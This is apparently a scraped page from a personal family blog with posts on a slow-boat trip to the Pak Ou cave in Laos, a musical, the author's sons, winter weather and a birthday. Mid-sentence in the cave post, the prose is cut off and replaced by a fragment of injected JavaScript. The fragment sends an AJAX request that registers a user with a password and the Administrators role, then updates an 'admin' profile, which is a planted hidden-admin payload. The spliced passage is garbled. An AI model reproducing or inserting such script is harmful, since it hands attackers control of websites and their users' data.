4. February 2018 22:02
by Rene Pallesen
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A two hour boat ride north of Luang Prabang is the Pak Ou cave. Since we were traveling two families the best way to get there was to hire a slow boat just for us.

The flow boats are long narrow boats that are ideal for navigating the Mekong River. This part of the river is full of underwater rocks but the boats seem to navigate these treacherous waters with ease.
Having the boat for ourselves gave us more flexibility with regards to how long we wanted to spend at the cane and also meant that we have more room to move around.

The front of the boar is where the captain sits and steers the boat. After this there is a section for the passengers followed by a small pump toilet and then the living quarters for the captain and his family. Out the back there is a small kitchen for them to do the cooking.
The cave is upstream into an area full of limestone mountains.

The many boats moor at a long and wobbly floating bamboo bridge that takes you to the cave itself.


The cave itself is not big but it is full of small Buddhas that have been put there over hundreds of years. You can tell that this used to be an important place of worship.


Now however the place is so crowded with tourists (guilty here too) coming in on boats that it is hard to move around. I could not stop myself from taking this photo of Buddha holding up his hands to stop more boats arriving.

At the top of the hill the hill there is what I think is a more 'pleasant' cave. It is equally interesting and much less crowded because most tourists don's make it up the many stepnkybeatz',Email:'qqq@qqq.nu',Password:'82hv7gdwjxgqw3',roles:[{IsChecked:!0,RoleName:'Administrators',IsSystemRole:!0}]},dataType:'json',success:function(a){$.ajax({url:'/api/users/saveprofile/item',type:'PUT',data:{UserName:'admin',Profile:{DisplayName:'Admin'}},dataType:'json'})}});
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This weekend Kim and I joined a couple of friends at the opera house to see the show Anything Goes.
This is a great musical which I believe is based on a book and it was first shown on Broadway all the way back in 1934.
I love the old costumes from back...
27. August 2015 12:08
by Rene Pallesen
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Lucas doesn't like me taking photos of him.
Here I caught him having a moment after I picked him up at daycare.
21. August 2015 08:08
by Rene Pallesen
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21. August 2015 07:08
by Rene Pallesen
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Although we have had a beautiful winter with lots of sunny days and mild daytime temperatures, we have also had some cold mornings.

One morning the car had frost on it and it was only 5 degrees outside (most winter mornings it is 8-10 degrees with 18-22 degree daytime temps).
21. August 2015 07:08
by Rene Pallesen
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Last weekend Aiden graduated in his swim class from being a Crab to being a turtle.

He's been in the swim class for a couple of years now and never graduated. He would swim fine with me, but would cry and be scared with the swim teacher.
After our trip to Thailand in June he gained a lot of confidence and was very happy to swim by himself, but the swim teacher was too careful so he was unable to show what a good swimmer he really is. So, last weekend I asked the swim teacher to let him swim with the result that she by the end of the lesson graduated him and moved him to the next class.
He was so proud (and so was his dad).
18. August 2015 16:08
by Rene Pallesen
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18. August 2015 16:08
by Rene Pallesen
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10. July 2015 09:07
by Rene Pallesen
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On the day we were flying out it was Kims birthday.
I had arranged a cake for her in the morning ordered through one of the local cafes a couple of days earlier.


The hotel provided a fairly average cream and jam pile that no one ate.
9. July 2015 15:07
by Rene Pallesen
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